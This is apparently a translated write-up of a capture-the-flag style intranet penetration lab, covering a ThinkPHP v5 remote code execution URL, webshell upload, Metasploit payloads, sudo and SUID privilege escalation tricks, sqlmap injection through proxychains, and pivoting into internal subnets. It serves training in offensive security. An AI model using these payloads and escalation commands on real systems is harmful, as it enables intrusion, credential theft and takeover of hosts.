A successful intranet penetration

Virtual network card configuration

Environmental issues:

The virtual machine bridge cannot obtain the IP address, so it can be solved by restoring the default settings and specifying the physical network card

For target machine 1, the internal network card cannot obtain the IP address, which is solved by adding configuration files.

Start to penetrate:

Times: 192.168.1.13

Centos7: 192.168.1.16

192.168.22.11

Scan port

Use nmap to scan for vulnerabilities

nmap -sS -A 192.168.101.91 --script=vuln

Slow, no screenshots

Visit 80

Test for unauthorized access to the pagoda, non-existent

Check robots.txt to find flag1

Baidu searches for thinkphp v5 vulnerabilities and finds remote code execution vulnerabilities

https://www.cnblogs.com/backlion/p/10106676.html

http://192.168.1.16/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

Use the command to execute and see flag2:

Write a sentence Trojan

The third flag was found when using the command to execute the Trojan looking for writing

Changed a new payload to write one sentence Trojan shy.php, the previous one was written successfully, but the path was not found

Use a chopper to connect

collect message:

1，uname -a

Linux 3.10.0-1062.1.1.el7.x86_64 x86_64

Kernel version: 3

Major revision: 10

0-1062: minor revision

Patch version

2,hostnamectl

Centos 7 x86

According to the collected information, use msf to generate related payload

Use the chopper to upload the generated Trojan file

Chopper give permission and run

Msf received shell

Pyhotn -c'import pty; pty.spawn("/bin/bash")' to establish an interactive shell

Attempt to suid privilege:

find / -user root –perm -4000 -print 2>/dev/null

Check whether passwd shadow is writable

How to write, replace the root password X of passwd with our own hash, such as replacing it with the hash in your own linux, you can modify the root password of the target

Whether Shadow is readable, it can be blasted if it is readable

Is Sudo abuse? The problem is that I don’t even know the password of the www user. Can I change my password? I just tested it.

sudo is a command that allows ordinary users to use super users. The configuration file is /etc/sudoers. The file defines the account that can execute sudo, defines the root access of an application, and whether password authentication is required.

Check which commands can be executed, that is, when you don’t need to know the root password, you need to verify your own password of ordinary authority

sudo awk 'BEGIN {system("/bin/sh")}'

sudo man man

sudo curl file:///etc/shadow

https://gtfobins.github.io/

View scheduled tasks: also no

Kernel stack overflow privilege escalation

Forget it, don’t mention rights, and direct intranet penetration

Check that the IP exists in 22 network segments

Add route

Set up proxy

Test whether the proxy is set up successfully, but it cannot be pinged (not in the same network segment), but it can be accessed, the proxy setting is successful

Use nmap to scan and find the surviving host 22.22 in the 22 network segment of the intranet

Use nmap for detailed scanning

Found that port 80 is opened, and Firefox is configured with proxy

Access port 80

Tips found in the source code

Start running

proxychains sqlmap -u "192.168.22.22/index.php?r=vul&keyword=1" -p keyword

Violent library

Burst table

Burst field

Cracked code

Robots file found backstage address

Then I stuck in the background for a long time, why there are too many points to use, file upload, database backup, database command execution, cause. . . It took a long time

Back-end management to modify the template (this place has been stuck for a long time, new creation, or modification in other files will not work, you have to modify it in the index file, and then let it run automatically)

Access using phpinfo() to get the root directory of the website

http://192.168.22.22/index.php?r=tag

Configure the agent on the physical machine, because kali cannot use the chopper

Use proxy tools

Use a chopper to connect

Using the chopper virtual terminal, it turns out that there is still a 33 network segment

Information collection ubuntu x86

Use msf to generate the backdoor file, because this server is located in the intranet, not a border machine, and cannot access our attack machine, so reverse_tcp reverse link cannot be used, only bind_tcp, forward connection, bind_tcp will open one on the server Port, msf actively connects to this port. As for what port to open is determined when the attacker msf generates the backdoor file.